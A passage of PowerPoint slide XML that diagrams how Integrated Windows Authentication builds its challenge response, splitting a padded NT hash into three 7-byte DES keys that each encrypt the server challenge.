        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Integrated Windows Authentication Illustrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="323850" y="2108200"/>
            <a:ext cx="3673475" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>NT Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69637" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="323850" y="2673350"/>
            <a:ext cx="1695450" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>LM 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69638" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="2019300" y="2673350"/>
            <a:ext cx="1695450" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>LM 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69639" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3714750" y="2673350"/>
            <a:ext cx="1695450" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Padding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69640" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3714750" y="2673350"/>
            <a:ext cx="282575" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69641" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="323850" y="2532063"/>
            <a:ext cx="1588" cy="8477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69642" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3997325" y="2532063"/>
            <a:ext cx="1588" cy="7778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69643" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="959643" y="2602707"/>
            <a:ext cx="423863" cy="1695450"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33333"/>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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69644" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="750888" y="3697288"/>
            <a:ext cx="8382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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>7 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69645" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="2655093" y="2602707"/>
            <a:ext cx="423863" cy="1695450"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33333"/>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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69646" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2446338" y="3697288"/>
            <a:ext cx="8382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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>7 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69647" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="4350543" y="2602707"/>
            <a:ext cx="423863" cy="1695450"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33333"/>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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69648" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4141788" y="3697288"/>
            <a:ext cx="8382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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>7 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69649" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="76200" y="5076825"/>
            <a:ext cx="1978025" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RESPpart1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69650" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2054225" y="5076825"/>
            <a:ext cx="1978025" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RESPpart2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69651" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4032250" y="5076825"/>
            <a:ext cx="1978025" cy="423863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RESPpart3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69652" name="AutoShape 30"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="853282" y="4723606"/>
            <a:ext cx="423862" cy="1978025"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38889"/>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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69653" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="581025" y="5957888"/>
            <a:ext cx="8382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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>8 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69654" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="2831307" y="4723606"/>
            <a:ext cx="423862" cy="1978025"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38889"/>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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69655" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2559050" y="5957888"/>
            <a:ext cx="8382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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>8 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69656" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="4809332" y="4723606"/>
            <a:ext cx="423862" cy="1978025"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38889"/>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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69657" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4537075" y="5957888"/>
            <a:ext cx="8382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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>8 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69658" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="76200" y="4157663"/>
            <a:ext cx="1978025" cy="423862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Challenge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69659" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2054225" y="4157663"/>
            <a:ext cx="1978025" cy="423862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Challenge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69660" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4032250" y="4157663"/>
            <a:ext cx="1978025" cy="423862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Challenge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69661" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5943600" y="1727200"/>
            <a:ext cx="914400" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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69662" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6096000" y="2489200"/>
            <a:ext cx="990600" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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69663" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3098800"/>
            <a:ext cx="0" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69664" name="Line 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3098800"/>
            <a:ext cx="0" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69665" name="Line 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3098800"/>
            <a:ext cx="0" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69666" name="Text Box 52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3479800"/>
            <a:ext cx="9906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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Use as DES key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69667" name="Text Box 53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3479800"/>
            <a:ext cx="9906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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Use as DES key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69668" name="Text Box 54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3479800"/>
            <a:ext cx="990600"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400" dirty="0"/>
              <a:t>Use as DES key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69669" name="Line 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4581525"/>
            <a:ext cx="0" cy="498475"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
